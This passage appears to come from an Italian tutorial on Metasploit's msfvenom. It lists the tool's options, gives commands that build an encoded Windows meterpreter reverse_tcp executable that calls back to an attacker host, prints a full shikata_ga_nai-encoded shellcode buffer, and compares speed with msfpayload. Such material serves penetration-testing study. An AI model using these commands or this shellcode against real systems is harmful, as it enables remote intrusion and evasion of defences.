Options:
-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-e, --encoder [encoder] The encoder to use
-a, --arch [architecture] The architecture to use
--platform [platform]
The platform of the payload
-s, --space [length] The maximum size of the resulting payload
-b, --bad-chars [list] The list of characters to avoid example: 'x00xff'
-i, --iterations [count] The number of times to encode the payload
-x, --template [path] Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-h, --help Show this message
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT DE SORTIE> > nomdefichier
eg:
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<NOTRE IP> | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -f exe > meter.exe
Sul sito Rapid7 è stato anche fatto un esempio dell’uso dello script, ovvero la creazione di un payload (reverse_tcp):
fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
buf =
"xd9xf7xd9x74x24xf4xbbx9cxecxeax8ax5fx2bxc9"+
"xb1x50x31x5fx18x03x5fx18x83xefx60x0ex1fx31"+
"x11xe0xa4x2axfbx23xfdxc7xdfx2fxa4x16xd6x61"+
"x10x68xb2x95x20x60xbex95x7cx65x55x40x38x01"+
"x4bx51x78x5fx1fx36xdex3bx99x8cxb2x11xb3x8d"+
"x2dx4cx66x7cxbdx02x0bxa6xa9x1ax32x65xcfx75"+
"xe8x15x1ax62x5fx69xe1xddx90x2ex2ex40xe0xb7"+
"x8bx16xfex15xdcx34x4cx4ex18x18x03x46x22xff"+
"xa8x9bxf0xd5x4fxe0xfdxabx71x6ex43x03xd5x28"+
"x07x29x5exadx8fxd8xafxbdx69x06xf1xd1x4ex9b"+
"x01x7dx5ax75x54x76x90xdbx5ex7bx97x37xa4xab"+
"x2dxe2x17x8excfx4bxd0x3fxefxc6xffxe5x1cxc3"+
"x99x04x15x2excex5ex16x86x5ax2fx62x0ax32xe5"+
"xe1xa4xd3x32x92x13xfdxcfxb6xa2x8bx97xcexf8"+
"x27x12xb0x6fxb5xa8x91x30x2cx14x40x2fx43xd8"+
"x45x46xd0x4cx58x59x8dx78x47xb2xdax79x6cxfa"+
"x07x43x18xc4x07x0ex2fxd0x71x84xcbx1cxabx01"+
"xb0x17xedx07x1bxb0xcfxd1x25xc1x9bx62x7cxac"+
"x43x2ex52x36xb1xfcx61xbcx0ex56xdcxe1x9dxc2"+
"x29x3fxe9xf3xb1xe2x72x77x99x4bxf3xfcx83xd2"+
"x19x6dx53x4cx64xa0xddx38x82x3dx15x66x38x96"+
"x39xb3xa4xe3xffx07xb7x8ax23xcaxc6xafx57x64"+
"x3dxf3x23x63x42x30x90x3bx67x26x81x24x61xc3"+
"xe4x51x75x30x47xf8x15xcbx21xe9x2ax30x9dx04"+
"x28xe3x37xb0xa4xaax1exf3"
Questo crea un payload in formato ruby, con l’encoder shikata_ga_nai, scelto automaticamente dal rank degli encoder, -s 480 indica che l’output non deve essere maggiore di 480 byte e in fineLHOST=192.168.0.120 setta la variabile LHOST per usarla con il Payload .
Ci viene fatto anche un confronto sotto l’aspetto della velocità d’esecuzione .
Il primo esempio mostra il tempo di esecuzione di Msfvenom, mentre il secondo quello di msfpayload emsfencode insieme:
fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1> /dev/null
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
real 0m2.744s
user 0m2.380s
sys 0m0.367s
fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R|./msfencode -c 3 1> /dev/null
[*] x86/shikata_ga_nai succeeded with size 321 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 348 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 375 (iteration=3)
real 0m3.070s
user 0m4.227s
sys 0m0.778s